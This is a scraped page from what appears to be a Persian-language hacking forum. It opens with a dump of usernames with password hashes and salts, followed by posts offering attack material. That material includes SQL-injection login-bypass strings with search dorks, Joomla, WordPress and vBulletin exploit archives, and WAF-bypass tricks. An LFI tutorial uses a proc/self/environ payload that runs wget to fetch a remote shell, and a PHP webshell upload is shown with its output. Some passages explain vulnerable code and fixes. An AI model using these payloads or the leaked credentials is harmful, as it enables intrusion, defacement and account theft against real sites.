075cf076bdd8e2398c06a884a5cd1614:qoROfyj1q9JAHjC206r6c5UbuUGA90Zu:Registered,ocqbzodp:63353152d1efbf1663b90e796e406173:cjusemacgDZJqHpee5bGi5EakKyAwx2I:Registered,ipqjenfmv:3ee4519c31ed4473c8a9ed0b16151835:lSQHpoHhxbhFM4LVUT2unl95rdwfpxRy:Registered,qcqmwjph:81199d1f8d2f1ecc1ef54ae3d31593bf:dwudXGnD1O0XAg6XHCUYT4TUdxDT2Liq:Registered,gjhyiwtf:72140203914c0e5bf827747e5a3a24a2:o1N1vxjD5r5Iwm0MmREbhOcBvAQ5xKrc:Registered,inhapyZiplild:29687540e875e5144333d41682aaca54:ZXlE5NCZep9ASFtusqs46zibXIy3rAhP:Registered,emizine:d82794818f9ad7eea16e158f239e8053:m1SECl144TzFxnKTlkcPmiEpBsmIGTVr:Registered,aluxibo:3fa245fd42b8a55d1008ae49d0bc6e1c:zPFWXZZo5uJdEEpxBRmb2vZxWUrsdjGC:Registered,epqtalllx:960804dc17ba16cffb1d42bcb85961e7:t3Gk4NPUp0nnYnqlUJD8UECJgQ10D1bq:Registered,npqbvfljq:252b27532e9519e9a5f6f1ce3d49db72:1hjvnP7cOEi1V40JvZVCKTzapEhDxKOC:Registered,spoubepiree:c17b9ec9fe751aa999e5a2d227cc4239:UgtZYFjeIdIKYsfssa73wnH2xQQQQgOP:Registered,kasabroot:8864f55f68bd3fc21145d98833968712:PBDVtoO2NYHkPSOkmcD89IFtOiYT3CEw:Registered,kalliefarber:5c7beef5f8aca13fa746b6d7bea19493:74Pbj6hzOoxJpy44pX9YdyBnS4jusXYt:Registered,noli:f6272d470853e135b8dc238a20a1ad7b:RW3DQHpLCTuMHKjhlpZ9upALO0x9ROCd:Registered,vr883q4ujpr:0ebe28552876d6c6dbe8342654305676:OFiyNyLJqvQQGiw18Uug4G387Ow9NINW:Registered,icqsidim:71984c95cefdf32fe76eba2154cb05fa:ow8NyXUlJHFR0G3HpNmgxa1WpPhz1kMA:Registered,gustavopupich:7e08c58be2aa89ef1e4415f6cbbecb65:YcIXvuVnfwCVg0vcpLBNTwsI3FFZgZV3:Registered,outradedo:7e7dccabdeac19ace6dccb4b8c3d9d9b:1DXFbn6uR64WsIwHF0soadVcmzozd2Np:Registered,smagAlamp:358ceea490c3a92cd88c380c3bb183bf:cdGbMGhOfiwmWDDohazMUSuZJt59GGXh:Registered,GoriePreofder:b1f5f48f3aa2447c9990418552476396:KcUi2uRAGF0f5cDgxGO27NskhWJ56W9C:Registered,luli:64de6e815fe854e066f8dd6d7dc6e3ae:F1BaBXLcHhaZfq9h9srbpcYMK9bddMIb:Registered,whiled4801:13a2e72d577a804e77726d6194a55ed4:Jgg5tu6gw6YY3MItj3zrVTGjaGEsddxJ:Registered,sdshbdogfdh:a9bf372d052b8de5ab200b2fe607c044:OQfWprpKWSsIiBJWKtqInzWc0N9FwvOv:Registered,cpqsyakev:da7b86994113c06a8d1f4f8a83d1ea6a:Tc32oj5MMHUUZ4mzajc0tjtyRd4VjxOa:Registered,lkxmqxgmil:461f0aa0c789cc70dfed69559123d51d:fzHUNLgaB2xjHnU3jF3qfG15Ssk0XJBn:Registered,neweffovamymn:1640b00682bd72526228588d45eda7be:nJuIY1onXk4QVaZgdUCUumVsAgGWhbah:Registered,ealjgxrtzef:6b04e286e96819f23605823894150f00:Sq7GNOxdr5AzkfsBWLGaVvGRnSAZssjO:Registered,elba_de_garcia:c39d29ffc83144e58b0552821952f2d5:ruhSLYStijHQiz2GO8qgidN5CDtYdlbY:Registered,wx1g6wps9t8:d2aec83d024470ace3e16c5f88f63710:evFQ3DpTqRsYxNvfIK0Sf9vX5vlCpOMu:Registered,Tisebroorie:ecd71d965ecc1d0b1c9c91e2e092b497:seEKGNXYaF5gsKDtUpLdlVBkYMf9GOfR:Registered,[email protected]<script cf-hash='f9e31' type="text/javascript"> /* */</script>:544d88f2c2d67d32667a06f6da2e501a:A5Iq69sygp6C24bl05UdZ49k95I0noQZ:Registered,eltsleyseri:1ed43577f3a4d8d497833800977feace:3gzMh3ArZ7bZ57kwKF5EjYzLbkAoRi1b:Registered,mary alb:0fcf90aa99048e95c1cf900436814e3d:IgHzZlzrFly8Y25kMA4kExEINpl4vnzy:Registered,rcpicco:0647715abe6719258b4bdf21d96a65c2:8BLd3oCM1aAxidFgsJJtIzH0NtW57Aib:Registered,kcqxueby:a72006b27a0d5311c46dcf5a883831e9:eEUyCHlm9Cp6elVkuBShDZ4IEF1l8BET:Registered,Ephellmef:1b383fabb25262065800656a1e3744b3:f05PPLn0tETKygHcfMdQtvT0DXg20qsE:Registered,overtip:73d0c5ec31a24c73584f0444b7522cb9:KEvwSYlywGw0CRKXRjAXZ5no5nES29nj:Registered,Evorodeeday:7401b8b07f83e0b807e28bb7d9ae07c5:LFGbWqpeL1jspMeT1MtIGKenhciB4u6K:Registered,MELMIRASOLES:a6ea7ccf6fe3ffe2d4adb5447e5b1e9b:ILu0iHrFzkIvZcqhvRZ2Yx6YtFPHfGJh:Registered,GPUENTE:ad71a90512ab00eb730421506fb86813:1SMpPdV4vAK32jy3mVREytergT2FJMzK:Registered,Pigreefug:690c92e5246b3277b6bdf061767caa2f:jClMZa8mLBTFajSCB9ZircIhbMv3E0Ke:Registered,luis alberto:b25b524a904afa77168e85c3df8b2d66:ZhMIhfqBGzDKYJtU5aRw4TUgkmrIqmGV:Registered,dpqrnximc:a880d8349504986c0e940b83be228278:puCLX3JPNG6q4aA32UqdT4HllTb0qyvO:Registered,fcaaesbts:7cf01b5d0124bb54ffae2d9ef40bb1dc:ylnbUfifttZHJ3yI7NUiYrpACa8t40HS:Registered,horasoro:83520878ba07cb1a2bd8f609ef3cb222:Plb1t63r5OrkEv9onFzloBcD0G3VThIU:Registered,DINOCBA:573822f069444966cd5d42eb00afe13f:RcMygvSejODnPSSxlhFui6qWsJnkisxl:Registered,mcambur:ff4a8cc39222bc8fe62ef71c3b58a0a9:1xMKeMDeprsToovex6xwUPwC4qEG8J6F:Registered,ttbbootpin کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f اولی یوزر هست بعد اون پسورد هک کردن سایت های ایرانی ممنوع بوده. یا حق
  15. سلام یک بایپس دیدم گفتم بزارم دوستان هم استفاده کنن برای دوستان مبتدی فیلم هم قرار دادم user:' OR 1 --+ password:' OR 1 --+ dork:inurl:emplogin.php intext:"Employer's Login" dork:inurl:login.php intext:"Employer's Login" امیدوارم مفید باشه دوستانی که به دفیس علاقه دارن بهم پیام بدن bypass.rar
  16. سلام خدمت عزیزان گارد ایران،در خدمت شما هستیم با آموزش آپلود شل و دیفیس سایت جوملا. نام کامل باگ:JCE Joomla Extension Remote File Upload Pass:guardiran.org http://s3.picofile.com/file/8202884826/Jomla_Shell_Upload_Full_Privet_8.zip.html فقط عذرخواهم که تو انجمن آپ نشد چون هرکار کردم نتونستم آپ کنمش،به هر مقدار بهشی که تقسیم کردم نشد. ارور internet server error میداد. فردا در انجمن آپ میکنم. اسکریپت مورد استفاده در آموزش پیوست شد. Pass:guardiran.org یاحق Jomla-Script.zip
  17. هک وبسایت با استفاده از باگ SQL با استفاده از jSQL در لینوکس فوق العاده سریع بدون کد نویسی ادمین فایندر و امکانات دیگری هم داره لطفا از این آموزش به طور صحیح استفاده کنین امیدوارم به دردتون بخوره Screencast_08-06-2017_11:13:05 PM.webm
  18. NeX.LINUX

    دورک های باگ DNN

    با سلام . چند دورک باگ DNN برای هک سایت هایی که این باگ رو دارند : inurl:"/portals/0/"site:com inurl:"portals/0/"site:net inurl:/Default.aspx?tabid=site:nl inurl:/tabid/ AND Default.aspxsite:com inurl:/tabid/ AND /language/en-US/Default.aspxsite:com inurl:/dnn/tabid/ AND Default.aspxinurl:tabid/162/Default.aspxinurl:/tabid/36/language/en-US/Default.aspxinurl:"/portals/0" site:.cominurl:"/portals/0"site:.tw inurl:tabid/*/Default.aspxsite:.nz inurl:tabid/*/Default.aspxsite:.ca inurl:tabid/*/Default.aspxsite:.id inurl:/tabid/*/language/*/Default.aspxsite:.it inurl:/tabid/*/language/*/Default.aspxsite:.hu inurl:/tabid/*/language/*/Default.aspxتاپیک آموزش هک سایت با این باگ : http://guardiran.org/forums/index.php?/topic/799-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D9%87%DA%A9-%D8%B3%D8%A7%DB%8C%D8%AA-%D8%A8%D8%A7-%D8%A8%D8%A7%DA%AF-dnn/
  19. با عرض سلام. با آموزش باگ امنیتی نسبتا جدیدی در وردپرس نسخه 4.7 و 4.7.1 و 4.7.2 در خدمت شما هستیم. این آسیب پذیری با نام Wp COntent Injection یا Wp Reset API شناخته میشه.آسیب پذیری از سطح بالایی برخورداره به طوری که میتونیم بدونیم دسترسی به پنل ادمین سایت پست هارو ویرایش کنیم. من در آموزش از یک اکسپلویت به زبان پایتون استفاده میکنم و در فایل زیپ براتون قرار میدم. امیدوارم پست مفید واقع بشه. موفق باشید Exploit.rar Wp.part2.rar Wp.part1.rar
  20. با سلام. با آموزش باگ امنیتی Vbulletin RCE در خدمت شما هستیم. در این آسیب پذیری از یک اسکریپت پایتون استفاده میکنیم و اقدام به آپلود شل میکنیم. امیدوارم از آموزش لذت ببرید. موفق باشید RCE.rar
  21. سلام دوستان امروز میخوایم با متد های جالب و بایپس ارور ها در sql injection کار کنیم اول اینکه ما فرض رو بر این میگیرم که شما sqli رو کامل بلدید و فقط نمیتونید بعضی جاهایی که ادمین سایت برای امنیت یه سد هایی رو سر راه ما گزاشته رو بایپس کنیم میریم سراغ آموزش بعد از اینکه ' رو گزاشتیم و صفحه مثل بار اول لود نشد(حالا هرطور دیگه ای.ارور sql .ریدایرکت شدن و...) اولین جایی که ممکنه تو sqli گیر بیفتیم زمانیه که میخوایم ستون هارو پیدا کنیم مثلا target.xxx/index.php?view=blog-detail&newsId=8 تارگت ماست حالا ما میخوایم ستون هاشو بدست بیاریم به این صورت http://target.xxx/index.php?view=blog-detail&newsId=8+order+by+9999-- شاید هر عددی هم که بزاریم باز سایت لود بشه پس بایپس میکینم خب برای اینکه این مشکل رو حل کنیم جلوی value یا همون عدد پشت =یه کوتیشن میذاریم و جلوی اون -- یه+ قرار میدیم و میبینیم مشکل به سادگی حل شد حالا ستون هارو بدست اوردیم http://target.xxx/index.php?view=blog-detail&newsId=8'+order+by+9999--+ به این صورت حالا ستون هاشو بدست اوردیم به طور مثال 8 تا بود حالا بعضی وقتا میبینیم که این کارو کردیم اما دیگه حتی با 1 هم لود نمیشه و ارور میده اینجاس کهه باید بجای order از کلمه group استفاده کنیم که دیگه مطمعنن این سری مشکل رفع میشه اما بعضی وقتا مشکل اساسیه و ارور forbidden میده و اصلا چیزی لود نمیکنه اینجاس که دوباره بایپس لازم میشیم اولین کاری که میکنیم اینه که بجای+--newsId=8'+order+by+9999 http://target.xxx/index.php?view=blog-detail&newsId=8+/*!50000order*/+by+9999-- رو تست میکنیم اگه باز هم نشد برای by هم این رو اضافه میکنیم احتمال زیاد حل میشه اگر باز هم نشد بجای -- عبارت %23 قرار میدیم اگر نشد حروف by / order رو بزرگ میکنیم اگه عمل نکرد میرسیم به اخرین راه قبل از کلمه order /**x**/ x میتونه هر حرفی باشه اضافه می کنیم اگر باز هم ارور داد از جلوی order پاک میکنیم و جلوی by میاریمشکه این سری به احتمال 99 درصد جواب میده خب فکر کنم زیاد طولانی شد ادامه جلسه برای هفته بعد تا خسته نشید تشکر یادتون نره
  22. mba1205

    lfi و rfi

    باگ lfi و rfi چیست؟ Lfi چیست : Lfi یا Local File Inclusion یک نوع دسترسی محلی به ما برای مشاهده ی فایل های سرور مورد نظر رو میده. باگ Lfi بیشتر در اشتباهات برنامه نویس در استفاده از توابعی مثل Include ,require() و غیره رخ میده. با استفاده از این باگ حرکت های زیادی میشه کرد از جمله : تبدیل آن به اجرای دستورات از راه دور با استفاده از گزارش های Apache خواندن فایل های مهم سیستمی با فایل های config Rfi : این باگ با بی احطیاتی برنامه نویس در استفاده از توابع Include و … به وجود میاد. در اصل این توابع فایل یا صفحه ای رو فراخوانی میکنن که اگر روی این درخواست کنترولی نباشه میتونه مونجر به باگ Rfi یا حتی Lfi بشه. بعد از پیدا کردن باگ میرسیم به خوانده فایلهای مهم مثل : etc/passwd که اکثرا به شکل زیر می باشد : …/…/…/…/etc/passwd%00 Or etc/;cat passwd%00 و در صورت دادن خطا به جای cat از کاراکترهای more , less , … استفاده نمائید. نحوی آپلود شل : به جای etc/passwd عبارت proc/self/environ%00 را وارد نمائید و سپس : ../../../../../../../../../../../../../../../proc/self/environ%00&cmd=wget http://shelinizinadresi.com/tools/bd/fxshell.txt -O scroll.php بعد از wget مسیر شل رو بهش میدید اکثر این باگ ها در میان پلاگینهای Joomla , وردپرس پیدا میشه . نمونه کدی که باعث ایجاد چنین باگی میشه : echo "<b><br><br>" . php_uname() . "<br></b>"; echo "<form action='' method='post' enctype='multipart/form-data' name='uploader' id='uploader'>"; echo "<input type='file' name='file' size='50″><input name='_upl' type='submit' id='_upl' value='Upload'></form>"; if ($_POST['_upl'] == "Upload") { if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo "<b>Upload!!!</b><br><br>"; } else { echo "<b>Upload !!!</b><br><br>"; } نحوه شناسایی باگ LFI در کد های PHP و تشخیص آسیب پذیری برای هک سایت بخش اول – تشخیص آسیب پذیری : این باگ در کدهای دیده میشود که درخواست فراخوانی یک فایل رو دارند. همونطور که از اسمش هم پیداست اجازه ی دسترسی به فایلهای روی سرور رو به ما میدهد که این فایل ها ممکنه که اطلاعات مهم و حساسی رو در خودشون ذخیره کرده باشند. برای شروع کد PHP زیر رو در نظر بگیرید <?php $page = $_GET[page]; include($page); ?> برسی کد: در این کد ساده یه متغییر تعریف شده و سپس از طریق پروتکل HTTP و با دستور GET (برای گرفتن مقدار از طریق URL) مقدار دهی میشه و در انتها با Include که یکی از توابع فراخوانی در PHP هست فراخوانی شده . اینجا باید این مطلب رو اضافه کنم که علاوه بر تابع Include از توابع زیر نیز برای فراخوانی یک فایل در زبان PHP استفاده میشود Include_Once Require Require_once virtual برای تست آسیب پذیری باگLFI باید موارد زیر رو در کد PHP موجود چک کنیم: 1- یکی از توابع ذکر شده بالا در آن وجود داشته باشد. 2- در داخل یکی از توابع بالا متغییر وجود داشته باشد. 3- متغییر از طریق پروتکل HTTP قابل مقدار دهی باشد. 4- شرایط لازم برای رسیدن به خط تابع موجود باشد. خوب می بینیم که در کد بالا تمامی موارد موجود هست: 1- وجود تابع Include 2- وجود متغییر $page 3- مقدار دهی به متغییر از طریق GET 4- تابع در اول برنامه فراخوانی میشود و قبل از آن چیزی وجود ندارد تا مانع اجرای تابع شود. اما در مقابل به این کدها توجه کنید : Exam1: <?php Include (“cloob.com/page.php”); ?> در این مثال هیچ گونه متغییری تعریف نشده است، یعنی شروط ما رعایت نشده است بنابراین این کد آسیب پذیر نیست . $filename = preg_replace("/[^a-z0-9A-Z]/","",$_GET['lang']); include("lang/" . $filename . ".php"); در مورد این مثال، خوب متغییرکه تعریف شده ، از Include هم که استفاده شده ولی دقت کنید که در خط قبلی متغییر ورودی را ف_ی_ل_ت_ر کرده است به این معنا که هرچه از طریق GET مقدار داده شود آنالیز شده و هر کاراکتری غیر از A-Z a-z 0-9 وجود داشته باشد رو حذف میکنه ، پس از این کد هم نمیتوان استفاده کرد.(این یک نمونه کد امن شده میباشد./ آموزش باگ LFI و نحوه پچ آن در خدمت شما هستم… همونطور که می دونید این باگ شبیه به باگ RFI هست با این تفاوت که باگ LFI ضریب خطر کمتری نسبت به RFI داره اما بازهم می تونه بسیار خطرناک باشه… مثلا می شه یوزر های سرور رو فهمید و بروت فورس کرد و یا این باگ رو به باگ RCE تبدیل کرد و… که خودتون بهتر می دونید… اما چگونگی بوجود آمدن این باگ به اونجایی برمی گرده که برنامه شما درخواست یک صفحه رو از url می گیره که این صفحه محدود به خود سرور هست… پس نمی شه از یه سرور دیگه فایل تزریق کرد… کد زیر را در نظر داشته باشید: $page=$_GET['page']; include "/pages/".$page; این کد در نظر اول خیلی معمولی به نظر می آد و هیچ مشکلی نداره!! اما وقتی در مرورگر آدرس زیر وارد بشه قضیه فرق می کنه: http://example.com/index.php?page=…../../etc/passwd با این کد نفوذگر به راحتی می تونه به فایل حاوی یوزرها دسترسی پیدا کنه و اون رو بخونه برای بروت فورس !!! همونطور که می دونید باگ lfi باگی هست که شما می تونید فایلهای داخل سرور رو بخونید با دستورات جابجایی بین پوشه های لینوکس و همینطور که می دونید برای بازگت به پوشه های قبل باید از کاراکتر های ” . ” و ” / ” استفاده کرد حالا اگه ما بیایم و از وارد شدن این کاراکتر ها جلوگیری کنیم مشکل می تونه حل بشه ! مثال: $pagina=$_GET['page']; $page=Replace($page, ".", ""); $page=Replace($page, "/", ""); include "/pages/".$page; دوستان این یک نمونه هست که میشه داده های ورودی رو فیلتر کرد… اگه خلاقیت باشه و فکر می شه خیلی راحت نمونه های بیشتری رو بکار برد… همونطور که مي دونيد اغلب وب سايتها امکان آپلود فايل دارند و اين يعني اينکه کاربر مي تونه فايل هاي خودش رو برروي سرور انتقال بدهد… و اگه موارد امنيتي بدرستي رعايت نشه مي تونه فاجعه باشه! به طور مثال کد زير قطعه کدي است براي آپلود فايل سيستم به سرور: $uploaddir = "uploads/"; // Relative path under webroot $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded.\n"; } else { echo "File uploading failed.\n"; } که فايل ها رو که از سمت کاربر آمده در مسير مربوطه قرار مي ده… قطعه کد زير نيز کدي است که در سمت کاربر فايل رو براي سرور مي فرسته: <form name="upload" action="upload1.php" method="POST" ENCTYPE="multipart/formdata"> Select the file to upload: <input type="file" name="userfile"> <input type="submit" name="upload" value="upload"> </form> با بررسي کد بالا در پي مي بريم که بدون هيچ ***** و کنترلي فايل برروي سرور انتقال ميابد… حال فرض کنيد اين فايل يک فايل php که حاوي کدهاي مربوط به شل کد هست باشه! نتيجه اينکه نه تنها سايت خودتون بلکه سرور هم دودستي در اختيار نفوذگر قرار داديد… همونطور که قبلا هم گفتم کد بالا یک کد آپلود ساده بدون اعمال هیچ فیلتری است… پس به راحتی می توان شل خودمون رو آپلود کنیم… اما حالا وقتی که ما این شل را به سمت سرور ارسال می کنیم چه اتفاقی می افته؟؟ هدر ارسال شده رو می بینیم: POST /upload1.php HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: localhost User-Agent: libwww-perl/5.803 Content-Length: 156 Content-Type: multipart/form-data; boundary=xYzZY –xYzZY Content-Disposition: form-data; name=”userfile”; filename=”shell.php” Content-Type: text/plain <?php system($_GET['command']); ?> –xYzZY– HTTP/1.1 200 OK Date: Wed, 13 Jun 2007 1232 GMT Server: Apache X-Powered-By: PHP/4.4.4-pl6-gentoo Content-Length: 48 Connection: close Content-Type: text/html File is valid, and was successfully uploaded. بله همونطور که انتظار می رفت سرور تایید کرده… که بعد از اجرای این کد بصورت زیر می توان به اعمال هکری خود پرداخت: http://localhost/uploads/shell.php?command=id uid=81(apache) gid=81(apache) groups=81(apache) اولین مرحله از فیلتر گذاری رو می خوام کار کنیم… در این مرحله اسکریپت چک می کنه که محتویات فایل چی هست و در واقع در این نوع فیلتر گذاری نوع فایل رو مورد بررسی قرار می دیم. برای مثال اگه سیاست سایت ما فقط برای آپلود تصاویر باشه ما در کد این نوع فایل رو اجازه دسترسی میدیم… کد زیر کد فیلتر گذاری شده بر این نوع هست که فقط به نوع تصویر اجازه آپلود شدن می دهد: if($_FILES['userfile']['type'] != "image/gif") { echo "Sorry, we only allow uploading GIF images"; exit; } $uploaddir = "uploads/"; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded.\n"; به قسمت اول این کد توجه کنید: if($_FILES['userfile']['type'] != "image/gif") { echo "Sorry, we only allow uploading GIF images"; exit; همونطور که متوجه شدید در این قسمت کد چک می کنه که ساختار فایل image/gif اینجوری باشه و اگر غیر از این بود از آپلود ممانعت به عمل میاد…
  23. با سلام خدمت تمامی همراهان عزیز چون آموزش تصویری و آپلود کردن تصاویر در وب سایت و چیدمان سخت و دشوار است یک وب سایت به شما معرفی کردم.با این سیستم عامل میتونید به انجام تست نفوذ و محک زدن امنیتسیستم گوشی و حتی سرور ها بپردازید!!! http://day.ir/articles/virtualmachine/Kali-Linux بفرمایین اگه استفاده کردین تشکر کنین.